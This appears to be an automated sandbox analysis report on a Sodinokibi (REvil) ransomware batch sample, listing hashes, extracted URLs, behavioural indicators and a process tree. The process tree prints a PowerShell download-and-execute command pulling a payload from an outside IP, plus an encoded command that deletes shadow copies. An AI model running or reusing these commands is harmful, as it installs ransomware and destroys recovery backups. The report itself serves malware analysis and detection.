Analysis
max time kernel: 34s
max time network: 54s
platform: windows7_x64
resource: win7v200430
submitted: 02-05-2020 07:10
Static task: static1
Behavioral task: behavioral1
  Sample: d9m2D1ds.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: d9m2D1ds.bat
  Resource: win10v200430
General
Target: d9m2D1ds.bat
Size: 195B
MD5: 6e7b679050b6a217806403c4caeba81a
SHA1: 98883268db2d45bea8e55862916cc88253aef3ed
SHA256: cb1606e450c581937346e52cb3296fef1a6579bac3b8f21c20cb504b1d73fa95
SHA512: bc63deef825deaacfd533b60551b5b91ae5925463e3bd92aeccec6c043c4f841d1d660ea7f14071d7483fca0c2cb27b24c1608e2a3a147dfe02d93d1d340bc55
Malware Config
Extracted: http://185.103.242.78/pastes/d9m2D1ds
Extracted: C:\52cpxh1-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3CC24F6FDDFCE86E
  http://decryptor.cc/3CC24F6FDDFCE86E
Signatures

Enumerates connected drives (3 TTPs)

Drops file in Program Files directory (18 IoCs)
Processes: powershell.exe
description | ioc | process
File opened for modification | \??\c:\program files\SwitchMount.pptm | powershell.exe
File opened for modification | \??\c:\program files\TraceBackup.m1v | powershell.exe
File created | \??\c:\program files\52cpxh1-readme.txt | powershell.exe
File created | \??\c:\program files (x86)\52cpxh1-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ConvertFromResize.dotx | powershell.exe
File opened for modification | \??\c:\program files\LockSelect.ppsm | powershell.exe
File opened for modification | \??\c:\program files\RegisterDebug.php | powershell.exe
File opened for modification | \??\c:\program files\StepConvert.mpeg | powershell.exe
File opened for modification | \??\c:\program files\InitializeReceive.css | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\52cpxh1-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\StepSave.dotm | powershell.exe
File opened for modification | \??\c:\program files\UseAssert.svgz | powershell.exe
File opened for modification | \??\c:\program files\AssertRemove.eps | powershell.exe
File opened for modification | \??\c:\program files\ConnectSet.kix | powershell.exe
File opened for modification | \??\c:\program files\InvokeSave.pub | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\52cpxh1-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\SuspendRestore.3gp | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\52cpxh1-readme.txt | powershell.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gf6z7c8twci.bmp" | powershell.exe

Makes http(s) request (1 IoCs)
Contacts server via http/https, possibly for C2 communication.
description | flow | ioc
HTTP URL | 1 | http://185.103.242.78/pastes/d9m2D1ds

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 1288 | powershell.exe
Token: SeDebugPrivilege | 1288 | powershell.exe
Token: SeDebugPrivilege | 288 | powershell.exe
Token: SeBackupPrivilege | 1736 | vssvc.exe
Token: SeRestorePrivilege | 1736 | vssvc.exe
Token: SeAuditPrivilege | 1736 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 1288 | powershell.exe

Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
description | pid | process | target process
PID 872 wrote to memory of 1288 | 872 | cmd.exe | powershell.exe
PID 1288 wrote to memory of 288 | 1288 | powershell.exe | powershell.exe
PID 1288 wrote to memory of 288 | 1288 | powershell.exe | powershell.exe
PID 1288 wrote to memory of 288 | 1288 | powershell.exe | powershell.exe
PID 1288 wrote to memory of 288 | 1288 | powershell.exe | powershell.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
pid | process
1288 | powershell.exe
1288 | powershell.exe
1288 | powershell.exe
288 | powershell.exe
288 | powershell.exe

Blacklisted process makes network request (1 IoCs)
Processes: powershell.exe
flow | pid | process
1 | 1288 | powershell.exe

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes: powershell.exe
pid | process
1288 | powershell.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\d9m2D1ds.bat"
  PID: 872
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d9m2D1ds');Invoke-COTPIVXHNYHR;Start-Sleep -s 10000"
    PID: 1288
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64 of a UTF-16LE string; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} i.e. deletion of Volume Shadow Copies, which matches the vssvc.exe activity and VSS writer registry keys recorded under "Modifies service".)
      PID: 288
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1736
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service